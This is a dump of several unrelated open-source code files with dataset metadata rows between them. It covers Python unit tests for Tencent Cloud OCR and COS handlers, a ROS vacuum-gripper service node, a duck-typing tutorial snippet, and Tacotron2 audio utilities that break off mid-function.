client.GeneralFastOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralFastOCR 方法时参数的 ImageUrl 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'efficient':
self.assertIsInstance(
client.GeneralEfficientOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralEfficientOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralEfficientOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralEfficientOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralEfficientOCR 方法时参数的 ImageUrl 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'accurate':
self.assertIsInstance(
client.GeneralAccurateOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralAccurateOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralAccurateOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralAccurateOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralAccurateOCR 方法时参数的 ImageUrl 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'handwriting':
self.assertIsInstance(
client.GeneralHandwritingOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralHandwritingOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralHandwritingOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralHandwritingOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralHandwritingOCR 方法时参数的 ImageUrl 字段不符合预期'
)
@mock.patch('handler_submit_img_to_ocr.settings')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_main_process(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
mock_settings: mock.MagicMock
):
"""测试主流程
测试用例: 2.1.1 - 2.1.10
"""
cos_client, ocr_client = self.prepare_mock(
mock_ocr_client,
mock_credential,
mock_cos_client,
mock_cos_config,
mock_settings
)
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
test_cases = [
('2.1.1', 'basic', False),
('2.1.2', 'fast', False),
('2.1.3', 'efficient', False),
('2.1.4', 'accurate', False),
('2.1.5', 'handwriting', False),
('2.1.6', 'basic', True),
('2.1.7', 'fast', True),
('2.1.8', 'efficient', True),
('2.1.9', 'accurate', True),
('2.1.10', 'handwriting', True),
]
for i, test_case in enumerate(test_cases):
mock_settings.OCR_TYPE = test_case[1]
mock_settings.OCR_DETECT_FIRST = test_case[2]
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.check_ret(ret, key, test_case[0])
check_cos_config(self, mock_cos_config, 2 * i + 2, test_case[0])
check_cos_client(self, mock_cos_client, 2 * i + 2, test_case[0])
self.check_cos_get_presigned_download_url(cos_client, key, test_case[0])
self.check_cos_put_object(cos_client, key, test_case[0])
self.check_ocr_submit(ocr_client, mock_settings, test_case[0])
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_cos_exception(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试函数运行过程中 COS 抛出异常的情况
测试用例: 2.2.1 - 2.2.4
"""
cos_client, ocr_client = self.prepare_mock(mock_ocr_client, mock_credential, mock_cos_client, mock_cos_config)
cos_client.get_presigned_download_url.side_effect = [
handler_submit_img_to_ocr.CosServiceError('GET', 'message', 'status_code'),
handler_submit_img_to_ocr.CosClientError('message'),
'auth_url',
'auth_url'
]
cos_client.put_object.side_effect = [
handler_submit_img_to_ocr.CosServiceError('GET', 'message', 'status_code'),
handler_submit_img_to_ocr.CosClientError('message'),
]
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
test_cases = [
('2.2.1', 1, 0),
('2.2.2', 2, 0),
('2.2.3', 4, 1),
('2.2.4', 6, 2)
]
for test_case in test_cases:
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.assertEqual(None, ret, f'[case {test_case[0]}] 函数返回内容不符合预期')
check_cos_config(self, mock_cos_config, test_case[1], test_case[0])
check_cos_client(self, mock_cos_client, test_case[1], test_case[0])
self.assertEqual(
test_case[2],
mock_ocr_client.OcrClient.call_count,
f'[case {test_case[0]}] 初始化 OCR 客户端的次数不符合预期'
)
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
def test_upload_bad_result(self, mock_cos_client, mock_cos_config):
"""测试上传格式错误的结果
测试用例: 2.3
"""
self.assertRaises(ValueError, handler_submit_img_to_ocr.upload_result_to_cos, {1, 2, 3}, 'filename.json')
@mock.patch('handler_submit_img_to_ocr.settings')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_no_text(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
mock_settings: mock.MagicMock
):
"""测试没有识别到文字的情况
测试用例: 2.4.1 - 2.4.10
"""
cos_client, ocr_client = self.prepare_mock(
mock_ocr_client,
mock_credential,
mock_cos_client,
mock_cos_config,
mock_settings
)
no_text_error = handler_submit_img_to_ocr.TencentCloudSDKException(code='FailedOperation.ImageNoText')
ocr_client.GeneralBasicOCR.side_effect = no_text_error
ocr_client.GeneralFastOCR.side_effect = no_text_error
ocr_client.GeneralEfficientOCR.side_effect = no_text_error
ocr_client.GeneralAccurateOCR.side_effect = no_text_error
ocr_client.GeneralHandwritingOCR.side_effect = no_text_error
ocr_client.TextDetect.return_value.to_json_string.return_value = '{"HasText": false}'
test_cases = [
('2.4.1', 'basic', False),
('2.4.2', 'fast', False),
('2.4.3', 'efficient', False),
('2.4.4', 'accurate', False),
('2.4.5', 'handwriting', False),
('2.4.6', 'basic', True),
('2.4.7', 'fast', True),
('2.4.8', 'efficient', True),
('2.4.9', 'accurate', True),
('2.4.10', 'handwriting', True),
]
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
for test_case in test_cases:
mock_settings.OCR_TYPE = test_case[1]
mock_settings.OCR_DETECT_FIRST = test_case[2]
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.assertEqual([], ret.get('result'), f'[case {test_case[0]}] 函数返回内容不符合预期')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_init_ocr_service_error(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
):
"""测试初始化 handler_submit_img_to_ocr.OcrService 错误的情况
测试用例: 2.5.1 - 2.5.3
"""
_, ocr_client = self.prepare_mock(mock_ocr_client, mock_credential, mock_cos_client, mock_cos_config)
# 2.6.1
self.assertRaises(ValueError, handler_submit_img_to_ocr.OcrService, 'ocr_type')
client = handler_submit_img_to_ocr.OcrService('basic')
client.ocr_type = None
# 2.6.2
self.assertRaises(ValueError, client.submit, 'auth_url')
# 2.6.3
self.assertRaises(ValueError, client.get_request, 'auth_url')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_ocr_exception(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试 OCR 服务发生异常的情况
测试用例: 2.6
"""
cos_client, ocr_client = self.prepare_mock(mock_ocr_client, mock_credential, mock_cos_client, mock_cos_config)
ocr_error = handler_submit_img_to_ocr.TencentCloudSDKException()
ocr_client.GeneralBasicOCR.side_effect = ocr_error
ocr_client.GeneralFastOCR.side_effect = ocr_error
ocr_client.GeneralEfficientOCR.side_effect = ocr_error
ocr_client.GeneralAccurateOCR.side_effect = ocr_error
ocr_client.GeneralHandwritingOCR.side_effect = ocr_error
ocr_client.TextDetect.side_effect = ocr_error
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.assertEqual(None, ret, f'[case 2.6] 函数返回内容不符合预期')
self.assertEqual(0, cos_client.put_object.call_count, f'[case 2.6] 发生了预期外的 COS 上传')
class TestCheckResult(unittest.TestCase):
@staticmethod
def get_cos_service_exception(code: str = 'error'):
"""生成 CosServiceError
"""
return handler_check_result.CosServiceError(
'GET',
(
'<Error>'
f' <Code>{code}</Code>'
' <Message>string</Message>'
' <Resource>string</Resource>'
' <RequestId>string</RequestId>'
' <TraceId>string</TraceId>'
'</Error>'
),
404
)
def check_ret(self, ret, status_code: int = 200, body: Any = None, case_id: str = None):
"""检查函数响应
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
self.assertIsInstance(ret, dict, f'{case_id_in_msg}主函数响应格式与预期不符')
self.assertEqual(status_code, ret.get('statusCode'), f'{case_id_in_msg}主函数响应状态码与预期不符')
self.assertFalse(ret.get('isBase64Encoded'), f'{case_id_in_msg}主函数响应 isBase64Encoded 字段与预期不符')
if status_code == 200:
self.assertEqual(
'application/json',
ret.get('headers', {}).get('Content-Type'),
f'{case_id_in_msg}主函数响应 Content-Type 与预期不符'
)
ret_body = json.loads(ret.get('body'))
self.assertEqual(body, ret_body, f'{case_id_in_msg}主函数响应内容与预期不符')
def check_head_object(self, client: mock.MagicMock, img_id: str, case_id: str = None):
"""检查是否正确使用 COS 的 head_object 方法
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
self.assertEqual(1, client.head_object.call_count, f'{case_id_in_msg}对 COS 作 head_object 请求的次数不符合预期')
self.assertEqual(
0,
len(client.head_object.call_args[0]),
f'{case_id_in_msg}对 COS 作 head_object 请求时有预期外的位置参数'
)
self.assertEqual(
settings.COS_BUCKET,
client.head_object.call_args[1].get('Bucket'),
f'{case_id_in_msg}对 COS 作 head_object 请求时 Bucket 参数不符合预期'
)
self.assertEqual(
f'{settings.IMAGES_ROOT}/{img_id}',
client.head_object.call_args[1].get('Key'),
f'{case_id_in_msg}对 COS 作 head_object 请求时 Key 参数不符合预期'
)
self.assertEqual(
2,
len(client.head_object.call_args[1]),
f'{case_id_in_msg}对 COS 作 head_object 请求时位置参数的数目不符合预期'
)
def check_get_object(self, mock_client: mock.MagicMock, img_id: str, call_count: int = -1, case_id: str = None):
"""检查是否正确使用 COS 的 get_object 方法
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
if call_count >= 0:
self.assertEqual(
call_count,
mock_client.get_object.call_count,
f'{case_id_in_msg}对 COS 作 get_object 请求的次数不符合预期'
)
for call_args in mock_client.get_object.call_args_list:
self.assertEqual(0, len(call_args[0]), f'{case_id_in_msg}对 COS 作 get_object 请求时有预期外的位置参数')
self.assertEqual(
settings.COS_BUCKET,
call_args[1].get('Bucket'),
f'{case_id_in_msg}对 COS 作 get_object 请求时 Bucket 参数不符合预期'
)
self.assertEqual(
f'{settings.RESULTS_ROOT}/{img_id}.json',
call_args[1].get('Key'),
f'{case_id_in_msg}对 COS 作 get_object 请求时 Key 参数不符合预期'
)
self.assertEqual(2, len(call_args[1]), f'{case_id_in_msg}对 COS 作 get_object 请求时位置参数的数目不符合预期')
def check_sleep(self, mock_time: mock.MagicMock, call_count: int = -1, case_id: str = None):
"""检查是否正确调用 time.sleep 方法
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
if call_count >= 0:
self.assertEqual(
call_count,
mock_time.sleep.call_count,
f'{case_id_in_msg}调用 time.sleep 的次数不符合预期'
)
for call_args in mock_time.sleep.call_args_list:
self.assertEqual(1, len(call_args[0]), f'{case_id_in_msg}调用 time.sleep 时位置参数数目不符合预期')
self.assertEqual(
settings.CHECK_RESULT_INTERVAL_TIME,
call_args[0][0],
f'{case_id_in_msg}调用 time.sleep 时,睡眠时长不符合预期'
)
self.assertEqual(0, len(call_args[1]), f'{case_id_in_msg}调用 time.sleep 时有预期外的关键字参数')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_main_process(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试主流程
测试用例: 3.1
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
ocr_result = mock.MagicMock()
ocr_result['Body'].get_raw_stream.return_value = BytesIO(b'["ocr_result1", "ocr_result2"]')
client = mock_cos_client.return_value
client.get_object.side_effect = [
self.get_cos_service_exception('NoSuchKey'),
self.get_cos_service_exception('NoSuchKey'),
ocr_result
]
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 200, ["ocr_result1", "ocr_result2"], '3.1')
check_cos_config(self, mock_cos_config, 2, '3.1')
check_cos_client(self, mock_cos_client, 2, '3.1')
self.check_head_object(client, img_id, '3.1')
self.check_get_object(client, img_id, 3, '3.1')
self.check_sleep(mock_time, 2, '3.1')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
def test_bad_request(self, mock_cos_client: mock.MagicMock, mock_cos_config: mock.MagicMock):
"""测试非法请求
测试用例:
3.2 无 img_id
3.3 img_id 带有 '/'
"""
ret = handler_check_result.main_handler({'queryString': {}}, None)
self.check_ret(ret, 400, None, '3.2')
ret = handler_check_result.main_handler(
{'queryString': {'img_id': 'hhh/12345678-1234-1234-1234-1234567890ab'}},
None
)
self.check_ret(ret, 400, None, '3.3')
check_cos_config(self, mock_cos_config, 0, '3.x')
check_cos_client(self, mock_cos_client, 0, '3.x')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
def test_img_not_found(self, mock_cos_client: mock.MagicMock, mock_cos_config: mock.MagicMock):
"""测试图片不存在
测试用例: 3.4
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
client.head_object.side_effect = self.get_cos_service_exception('NoSuchResource')
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler(
{'queryString': {'img_id': img_id}},
None
)
self.check_ret(ret, 404, None, '3.4')
check_cos_config(self, mock_cos_config, 1, '3.4')
check_cos_client(self, mock_cos_client, 1, '3.4')
self.check_head_object(client, img_id, '3.4')
self.check_get_object(client, img_id, 0, '3.4')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_timeout(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试轮询 COS 超时
测试用例: 3.5
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
client = mock_cos_client.return_value
client.get_object.side_effect = [
self.get_cos_service_exception('NoSuchKey')
for _ in range(30)
]
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 200, None, '3.5')
check_cos_config(self, mock_cos_config, 2, '3.5')
check_cos_client(self, mock_cos_client, 2, '3.5')
self.check_head_object(client, img_id, '3.5')
self.check_get_object(client, img_id, 11, '3.5')
self.check_sleep(mock_time, 11, '3.5')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_cos_exception(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试 COS 返回异常的情况
测试用例: 3.6 - 3.9
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
ocr_result = mock.MagicMock()
ocr_result['Body'].get_raw_stream.return_value = BytesIO(b'["ocr_result1", "ocr_result2"]')
client = mock_cos_client.return_value
client.head_object.side_effect = [
handler_check_result.CosServiceError('GET', 'message', 'status_code'),
handler_check_result.CosClientError('message'),
'head',
'head'
]
client.get_object.side_effect = [
handler_check_result.CosServiceError('GET', 'message', 'status_code'),
handler_check_result.CosClientError('message'),
]
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.6')
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.7')
self.check_get_object(client, img_id, 0, '3.6 - 3.7')
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.8')
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.9')
check_cos_config(self, mock_cos_config, 6, '3.x')
check_cos_client(self, mock_cos_client, 6, '3.x')
self.check_sleep(mock_time, 0, '3.x')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_bad_ocr_result(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试 OCR 返回非法数据
测试用例: 3.10
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
ocr_result = mock.MagicMock()
ocr_result['Body'].get_raw_stream.return_value = BytesIO(b'test')
client = mock_cos_client.return_value
client.get_object.return_value = ocr_result
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.10')
check_cos_config(self, mock_cos_config, 2, '3.10')
check_cos_client(self, mock_cos_client, 2, '3.10')
self.check_head_object(client, img_id, '3.10')
self.check_get_object(client, img_id, 1, '3.10')
self.check_sleep(mock_time, 0, '3.0')
| 39.754357 | 120 | 0.580995 |
8f8a05f5a652b9df487255b02ea590c7b3aba108
| 5,873 |
py
|
Python
|
vb_simulation_pkgs/pkg_vb_sim/scripts/node_service_server_vacuum_gripper_ur5_1.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | 1 |
2021-07-13T07:05:29.000Z
|
2021-07-13T07:05:29.000Z
|
vb_simulation_pkgs/pkg_vb_sim/scripts/node_service_server_vacuum_gripper_ur5_1.py
|
TejasPhutane/Eyantra-2021-Vargi-Bots
|
ab84a1304101850be8c0f69cfe6de70d53c33189
|
[
"MIT"
] | 1 |
2021-06-05T07:58:03.000Z
|
2021-06-05T07:58:03.000Z
|
vb_simulation_pkgs/pkg_vb_sim/scripts/node_service_server_vacuum_gripper_ur5_1.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
import rospy
from gazebo_ros_link_attacher.srv import Attach, AttachRequest, AttachResponse
from pkg_vb_sim.srv import vacuumGripper
from pkg_vb_sim.srv import vacuumGripperRequest
from pkg_vb_sim.srv import vacuumGripperResponse
from pkg_vb_sim.msg import LogicalCameraImage
class VacuumGripper():
# Constructor
def __init__(self):
param_config_vacuum_gripper = rospy.get_param('config_vacuum_gripper_ur5_1')
self._vacuum_gripper_model_name = param_config_vacuum_gripper['vacuum_gripper_model_name']
self._vacuum_gripper_link_name = param_config_vacuum_gripper['vacuum_gripper_link_name']
self._object_model_name = ""
self._object_link_name = param_config_vacuum_gripper['attachable_object_link_name']
self._attachable_object_prefix = param_config_vacuum_gripper['attachable_object_prefix']
self._attachable_object_delimiter = param_config_vacuum_gripper['attachable_object_delimiter']
self._logical_camera_topic_name = param_config_vacuum_gripper['logical_camera_topic_name']
print(param_config_vacuum_gripper)
self._flag_pickable = False
self._flag_plugin_in_use = False
self._count = 0
rospy.loginfo("Creating ServiceProxy to /link_attacher_node/attach")
self._attach_srv_a = rospy.ServiceProxy('/link_attacher_node/attach',Attach)
self._attach_srv_a.wait_for_service()
rospy.loginfo("Created ServiceProxy to /link_attacher_node/attach")
rospy.loginfo("Creating ServiceProxy to /link_attacher_node/detach")
self._attach_srv_d = rospy.ServiceProxy('/link_attacher_node/detach',Attach)
self._attach_srv_d.wait_for_service()
rospy.loginfo("Created ServiceProxy to /link_attacher_node/detach")
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper init done." + '\033[0m')
def activate_vacuum_gripper(self):
rospy.set_param("vacuum_gripper_plugin_in_usage", True)
rospy.loginfo("Attach request received")
req = AttachRequest()
req.model_name_1 = self._vacuum_gripper_model_name
req.link_name_1 = self._vacuum_gripper_link_name
req.model_name_2 = self._object_model_name
req.link_name_2 = self._object_link_name
self._attach_srv_a.call(req)
rospy.set_param("vacuum_gripper_plugin_in_usage", False)
def deactivate_vacuum_gripper(self):
rospy.set_param("vacuum_gripper_plugin_in_usage", True)
rospy.loginfo("Detach request received")
req = AttachRequest()
req.model_name_1 = self._vacuum_gripper_model_name
req.link_name_1 = self._vacuum_gripper_link_name
req.model_name_2 = self._object_model_name
req.link_name_2 = self._object_link_name
self._attach_srv_d.call(req)
rospy.set_param("vacuum_gripper_plugin_in_usage", False)
def callback_service_on_request(self, req):
self._flag_plugin_in_use = rospy.get_param("vacuum_gripper_plugin_in_usage")
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Activate: {}".format(req.activate_vacuum_gripper) + '\033[0m')
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Flag Pickable: {}".format(self._flag_pickable) + '\033[0m')
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Plugin in Use: {}".format(self._flag_plugin_in_use) + '\033[0m')
if( (req.activate_vacuum_gripper is True) and (self._flag_pickable is True) and (self._flag_plugin_in_use is False) ):
self.activate_vacuum_gripper()
return vacuumGripperResponse(True)
else:
# self._flag_pickable = False
self.deactivate_vacuum_gripper()
return vacuumGripperResponse(False)
def callback_topic_subscription(self, rx_msg):
# rospy.logwarn( '\033[94m' + "{}".format(rx_msg) + '\033[0m')
self._count += 1
number_models = len(rx_msg.models)
if ( (self._count > 1) and (number_models == 0) ):
return
elif ( (self._count > 1) and (number_models == 0) ):
flag_attachable_object_found = False
self._flag_pickable = False
self._count = 0
else:
for i in range(0, number_models):
name_model = rx_msg.models[i].type
lst_name_model = name_model.split(self._attachable_object_delimiter)
if(lst_name_model[0] == self._attachable_object_prefix):
rospy.loginfo( '\033[94m' + ">>> [ur5_1] Vacuum Gripper: Pickable object found {}. Pickable: {}".format(name_model, self._flag_pickable) + '\033[0m')
self._object_model_name = name_model
flag_attachable_object_found = True
self._flag_pickable = True
break
# if(flag_attachable_object_found is False):
# rospy.logwarn("making flag pickable False")
# self._flag_pickable = False
# Destructor
def __del__(self):
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Del." + '\033[0m')
def main():
rospy.init_node('node_service_server_vacuum_gripper_ur5_1')
ur5_vacuum_gripper = VacuumGripper()
s = rospy.Service('/eyrc/vb/ur5/activate_vacuum_gripper/ur5_1', vacuumGripper, ur5_vacuum_gripper.callback_service_on_request)
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Activation Service Ready." + '\033[0m')
rospy.Subscriber(ur5_vacuum_gripper._logical_camera_topic_name, LogicalCameraImage, ur5_vacuum_gripper.callback_topic_subscription)
rospy.spin()
if __name__ == "__main__":
main()
| 36.478261 | 169 | 0.664907 |
2d087b8caa7fb2725c6b94af865cdc71a28aada9
| 374 |
py
|
Python
|
Python/Courses/Python-Tutorials.Telusko/01.Object-Oriented-Programming/16.01-Duck-Typing.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/01.Object-Oriented-Programming/16.01-Duck-Typing.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/01.Object-Oriented-Programming/16.01-Duck-Typing.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
class PyCharm:
def execute(self):
print("Compiling")
print("Running")
class MyCharm:
def execute(self):
print("Spell Check")
print("Convention Check")
print("Compiling")
print("Running")
class Laptop:
def code(self, ide):
ide.execute()
ide = PyCharm()
ide2 = MyCharm()
lap = Laptop()
lap.code(ide2)
| 14.96 | 33 | 0.574866 |
d976f71c3429044648411f53a4225fe77bd37af7
| 4,804 |
py
|
Python
|
research/audio/tacotron2/src/utils/audio.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/audio/tacotron2/src/utils/audio.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/audio/tacotron2/src/utils/audio.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
'''audio'''
import librosa
import librosa.filters
import numpy as np
import scipy
from scipy.io import wavfile
from src.hparams import hparams as hps
def load_wav(path):
''' load wav '''
_, wav = wavfile.read(path)
signed_int16_max = 2**15
if wav.dtype == np.int16:
wav = wav.astype(np.float32) / signed_int16_max
wav = wav / np.max(np.abs(wav))
return wav
def save_wav(wav, path):
''' save wav'''
wav *= 32767 / max(0.01, np.max(np.abs(wav)))
wavfile.write(path, hps.sample_rate, wav.astype(np.int16))
def preemphasis(x):
''' preemphasis '''
return scipy.signal.lfilter([1, -hps.preemphasis], [1], x)
def inv_preemphasis(x):
''' inv preemphasis '''
return scipy.signal.lfilter([1], [1, -hps.preemphasis], x)
def spectrogram(y):
''' extract spectrogram '''
D = _stft(preemphasis(y))
S = _amp_to_db(np.abs(D)) - hps.ref_level_db
return _normalize(S)
def inv_spectrogram(spec):
'''Converts spectrogram to waveform using librosa'''
S = _db_to_amp(_denormalize(spec) + hps.ref_level_db)
return inv_preemphasis(_griffin_lim(S ** hps.power))
def melspectrogram(y):
'''extract normalized mel spectrogram'''
D = _stft(y)
S = _amp_to_db(_linear_to_mel(np.abs(D))) - hps.ref_level_db
return _normalize(S)
def inv_melspectrogram(spec):
'''convert mel spectrogram to waveform '''
mel = _db_to_amp(_denormalize(spec) + hps.ref_level_db)
S = _mel_to_linear(mel)
return _griffin_lim(S ** hps.power)
def find_endpoint(wav, threshold_db=-40, min_silence_sec=0.8):
''' find endpoint '''
window_length = int(hps.sample_rate * min_silence_sec)
hop_length = int(window_length / 4)
threshold = _db_to_amp(threshold_db)
for x in range(hop_length, len(wav) - window_length, hop_length):
if np.max(wav[x:x + window_length]) < threshold:
return x + hop_length
return len(wav)
def _griffin_lim(S):
'''librosa implementation of Griffin-Lim
Based on https://github.com/librosa/librosa/issues/434
'''
angles = np.exp(2j * np.pi * np.random.rand(*S.shape))
S_complex = np.abs(S).astype(np.complex)
y = _istft(S_complex * angles)
for _ in range(hps.gl_iters):
angles = np.exp(1j * np.angle(_stft(y)))
y = _istft(S_complex * angles)
return y
def _stft(y):
''' stft using librosa '''
n_fft, hop_length, win_length = _stft_parameters()
return librosa.stft(
y=y,
n_fft=n_fft,
hop_length=hop_length,
win_length=win_length,
pad_mode='reflect')
def _istft(y):
''' istft using librosa '''
_, hop_length, win_length = _stft_parameters()
return librosa.istft(y, hop_length=hop_length, win_length=win_length)
def _stft_parameters():
''' get stft parameters'''
n_fft = (hps.num_freq - 1) * 2
hop_length = hps.hop_length
win_length = hps.win_length
return n_fft, hop_length, win_length
_mel_basis = None
def _linear_to_mel(spec):
''' linear spectrogram to mel spectrogram'''
global _mel_basis
if _mel_basis is None:
_mel_basis = _build_mel_basis()
return np.dot(_mel_basis, spec)
def _mel_to_linear(spec):
''' mel spectrogram to linear spectrogram '''
global _mel_basis
if _mel_basis is None:
_mel_basis = _build_mel_basis()
inv_mel_basis = np.linalg.pinv(_mel_basis)
inverse = np.dot(inv_mel_basis, spec)
inverse = np.maximum(1e-10, inverse)
return inverse
def _build_mel_basis():
''' build mel filters '''
n_fft = (hps.num_freq - 1) * 2
return librosa.filters.mel(
hps.sample_rate,
n_fft,
fmin=hps.fmin,
